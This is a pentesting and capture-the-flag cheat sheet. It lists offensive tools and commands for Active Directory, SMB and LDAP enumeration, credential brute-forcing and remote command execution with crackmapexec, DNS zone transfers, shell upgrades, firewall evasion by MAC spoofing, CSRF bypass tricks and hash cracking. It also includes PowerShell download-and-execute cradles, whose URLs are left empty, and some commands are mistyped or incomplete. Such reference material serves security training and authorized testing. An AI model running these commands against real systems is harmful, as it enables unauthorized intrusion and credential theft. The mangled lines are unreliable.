This cheat sheet will be updated regularly.

Pentesting/CTF Cheat Sheet



evil-winrm -> The ultimate WinRM shell for hacking/pentesting
empire -> Empire is a PowerShell and Python post-exploitation agent.
watson -> Watson is a .NET tool designed to enumerate missing KBs and suggest exploits for Privilege Escalation vulnerabilities.
nishang -> Nishang - Offensive PowerShell for red team, penetration testing and offensive security.
bloodhound -> BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify


# if you find a group policy file, you can decrypt it with 'gpp-decrypt' this is 
the old way of windows storing group policy
# if there isnt any account lockout threshold you can bruteforce users.
# os version can be specified if the dns version is known. if it the dns version ends with x.x.7601 this is windows server 2008 if it is bigger than 9000 it is windows 2016
# windows ttl is 128 by default

Active Directory

# using crackmapexec to dump the Password Policy
crackmapexec smb --pass-pol <ip>

# logging in with crackmapexec username field can take a txt file to bruteforce
crackmapexec smb <ip> -u <username> -p '<password>'

# alternative to upper
crackmapexec winrm <ip> -u <username> -p '<password>'

# executing commands with winrm module
crackmapexec winrm <ip> -u <username> -p '<password>' -x "whoami"

# rpcclient
rpclient <ip>

# rpc anonymous login
rpclient -U '' <ip>

# info about activ directory accounts
rpc> querydispinfo


# using ldapsearch simple auth to extract info out of active directory
ldapsearch -h <ip> -x

# ldap search querying base scope
ldapsearch -h <ip> -x -s base namingcontexts

# ldapsearch query persons within given base
ldapsearch -h -x -b "DC=cascade,DC=local" '(objectClass=Person)' > ldap_person_query.out


# msf has many modules for smb
search smb

# run safe scripts for port 445
nmap --script safe -p 445 <ip>

# list shares anonymous login
smbclient -L //<ip>

# enumerate smb
enum4linux <ip>

# enumerate smb file shares
smbmap -H <ip>

# list contents of <share_name>
smbmap -R <share_name> -H <ip>

# download a file from smb
smbclient //<ip>/<share_name>

# query target domain for user data -all -dc-ip <dc_ip> <hostname>/<username>

# if user has admin privileges on the box, user can execute commands with psexec <hostname>/<username>@<ip>

# null authentication
smbclient -U '' -N -L //<ip>


# Downloading files
IEX(New-Object Net.Webclient).downloadString('[](')

# Download file to the remote server within a cmd shell using powershell
echo IEX(New-Object Net.WebClient).downloadString('[](') | powershell -noprofile -

Privilege Escalation

PowerShell: Get-NetIPConfiguration or Get-NetIPAddress
# Empire has recon scripts
# Sherlock and watson(updated version) scans for kernel exploits


# learning hostname
> server <ip>
> <ip>

# enumeration
dnsrecon -d <ip> -r

# zone transfer without domain
dig axfr @<DNS_IP>
# with domain
dig axfr @<DNS_IP> <DOMAIN> 



# enumerate software version with
# linux ttl is 64 by default

# better shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
stty raw -echo
export TERM=xterm

# print public ip
ip addr show eth0 | grep inet | awk '{ print $2; }' | sed 's/\/.*$//'

Privilege Escalation

# listing sudo privileges
sudo -l
cat /etc/sudoers

# distro version information
cat /etc/lsb-release


# run safe scripts for port 445
nmap --script safe -p 445 <ip>
# -d can be used to debug failed scripts

# firewall bypass by changing your MAC to something legit
nmap –spoof-mac=IBM


# list all of the nmap scripts
locate -r '\.nse$' | xargs grep categories

# list all of the nmap scripts with certain categories
locate -r '\.nse$' | xargs grep categories | grep 'default\|version\|safe' | grep smb


Csrf Tips

Some applications correctly validate the token when the request uses the POST method but skip the validation when the GET method is used.
In this situation, the attacker can switch to the GET method to bypass the validation and deliver a CSRF attack.

In some cases application wont mind if you remove the csrf parameter completely.

In some cases csrf isnt tied to user account, instead it gets csrf tokens from a pool. so attacker can login to the app
get a valid csrf token and attack the user that way.

Information Disclosure

trigger errors.
developer comments.
debugging data
accessing other account information via a logic bug
Source code disclosure via backup files edited files may have tilda (~) in filename
example : /lib/template.php~ can return source code.
HTTP TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests that use the TRACE method by echoing in the response the exact request that was received. This behavior is often harmless, but occasionally leads to information disclosure

General Tips

# if you see drupal check /CHANGELOG.txt to enumerate the version
# always check robots.txt


# CMS Enum

# vuln scan


steghide extract -sf <filename>

# display info about a file whether it has embedded data or not.
steghide info file

Hash Cracking

# crack a file
john --wordlist=<wordlist> <filename>

# crack ssh hash
python ssh2john id_rsa > id_rsa.hash
john id_rsa.hash --wordlist=rockyou.txt